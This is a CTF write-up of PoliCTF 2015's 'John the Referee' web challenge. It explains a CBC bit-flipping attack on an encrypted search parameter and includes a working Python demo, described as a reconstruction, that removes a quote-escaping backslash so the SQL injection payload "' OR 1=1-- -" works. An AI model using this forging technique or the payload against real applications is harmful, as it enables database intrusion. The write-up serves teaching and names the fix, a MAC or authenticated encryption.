[PoliCTF 2015] [Web 150 – John The Referee] Write Up

JOHN THE REFEREE

150 Points – SOLVED
John is one of the most famous referees and security experts in the world. He loves encryption and his referee uniforms. You can find them on his online store.
Unfortunately his best uniform is not on sale for anyone. I know that it is available only on invitation. I want that uniform!
referee.polictf.it

Landing on the site, we see a page listing shirts for sale, and we have to find THE one which is not on sale.

There is also a search engine, which seems to look up shirt names only and produces a strange-looking URL (the parameter could be encrypted).

[Screenshot: Referee home]

Our first thought was to check whether the shirts are identified by a numeric ID (as usual), which is the case: the URLs of the shirt detail pages look like /uniform/<ID>.

By looking at the HTML of the main shirts page, we can clearly see that the shirt with ID 9 is missing from the listing.

[Screenshot: id jump]

To confirm, we can request what should be that shirt's image at /static/images/9.jpg. It exists, and shows a cute lady (sweet 🙂).

[Screenshot: 9.jpg]

As expected, simply replacing a real ID with 9 in a detail URL (loading /uniform/9) doesn't work. The harder, the more fun!

So we turn to the search engine and try some attacks on it. We'll begin with a wonderful SQL injection (surprising, isn't it 🙂).

[Screenshot: Strange url]

Unfortunately, the SQL injection didn't work: the quote is escaped before it reaches the query, so it shows up with an escape character in front of it.

When a search is submitted, the server answers with a 302 redirect to a URL of the form /search-result/<weird_parameter>.
Simply loading that URL displays our search string, which means the search string is carried inside the long weird parameter (encrypted, as the flag later confirms, with CBC mode).
After a few tests, we saw that modifying the beginning of the parameter doesn't produce an error, but changes the first character of the displayed search string. That is the classic CBC malleability: each plaintext block is the block-cipher decryption of its ciphertext block XORed with the previous ciphertext block (or the IV for the first block), so flipping a bit at the start of the parameter flips the same bit in the first plaintext byte without the server noticing anything.
So we can XOR the right byte of the parameter with (escape character XOR the character we want) and get rid of the escaping character, leaving an unescaped quote in the query. Note that this only works cleanly because the bytes being modified are the IV: flipping bits in an actual ciphertext block would scramble that whole block and only flip the corresponding bit in the next one.
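To make the attack concrete, here is an added example of the bit-flip; it is not the challenge's code, and the real cipher, key and token layout of referee.polictf.it are unknown. It assumes the parameter is hex(IV || ciphertext), that the server escapes a single quote addslashes-style with a backslash before encrypting, and that the escaped string is concatenated into a LIKE query. The block cipher is a toy Feistel construction over HMAC-SHA256 standing in for AES; the malleability demonstrated is a property of CBC mode, not of the block cipher.

```python
"""CBC bit-flipping against an escaped, encrypted search parameter.

Added example, not the challenge's code. The challenge's cipher, key and
token layout are unknown; this uses a toy 16-byte Feistel block cipher
(HMAC-SHA256 round function) and ASSUMES the token is hex(iv || ciphertext).
"""
import hashlib
import hmac
import os

BLOCK = 16
KEY = b"constructed-demo-key-not-the-real-one"  # constructed, not the challenge key


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, i: int, half: bytes) -> bytes:
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[: BLOCK // 2]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Toy 4-round Feistel cipher (stand-in for AES; only invertibility matters here)."""
    left, right = block[:8], block[8:]
    for i in range(4):
        left, right = right, _xor(left, _round(key, i, right))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for i in reversed(range(4)):
        left, right = _xor(right, _round(key, i, left)), left
    return left + right


def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        block = ciphertext[i:i + BLOCK]
        out.append(_xor(block_decrypt(key, block), prev))  # P[i] = D(C[i]) ^ C[i-1]
        prev = block
    return b"".join(out)


# ---- server side: hypothetical reconstruction of the search endpoint ----

def escape_quotes(query: str) -> str:
    """addslashes-style escaping: the quote stays but gets a backslash in front."""
    return query.replace("\\", "\\\\").replace("'", "\\'")


def make_search_token(key: bytes, query: str, iv: bytes = b"") -> str:
    """What the 302 Location would carry: hex(iv || CBC(escaped query))."""
    iv = iv or os.urandom(BLOCK)
    return (iv + cbc_encrypt(key, iv, pad(escape_quotes(query).encode()))).hex()


def recover_query(key: bytes, token: str) -> str:
    raw = bytes.fromhex(token)
    return unpad(cbc_decrypt(key, raw[:BLOCK], raw[BLOCK:])).decode("latin-1")


def build_sql(key: bytes, token: str) -> str:
    """The server trusts that escaping happened before encryption and concatenates."""
    return f"SELECT name FROM uniform WHERE name LIKE '%{recover_query(key, token)}%'"


# ---- attacker side: no key needed ----

def flip_first_char(token: str, old: str, new: str) -> str:
    """Turn the first plaintext byte from `old` into `new` by XORing IV[0].

    P[0] = D(C[0]) ^ IV, so the flip lands exactly in the first plaintext byte
    and no other block is disturbed (the IV itself is never decrypted)."""
    raw = bytearray(bytes.fromhex(token))
    raw[0] ^= ord(old) ^ ord(new)
    return raw.hex()


if __name__ == "__main__":
    token = make_search_token(KEY, "' OR 1=1-- -")
    print("honest:", build_sql(KEY, token))   # backslash-escaped quote, injection fails
    forged = flip_first_char(token, "\\", " ")
    print("forged:", build_sql(KEY, forged))  # backslash became a space, quote is live
```

The attacker only needs to know (or guess) the byte value sitting at the position to flip; here the escaping backslash is the first plaintext byte because the search began with a quote. An authenticated mode (or a MAC over the token) would have rejected the modified parameter outright, which is what the flag is hinting at.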

[Screenshot: Exploited]

YES, with the quote unescaped the injection goes through and we finally get the flag: flag{Damn_John!_CBC_1s_not_the_best_s0lution_in_this_c4se}
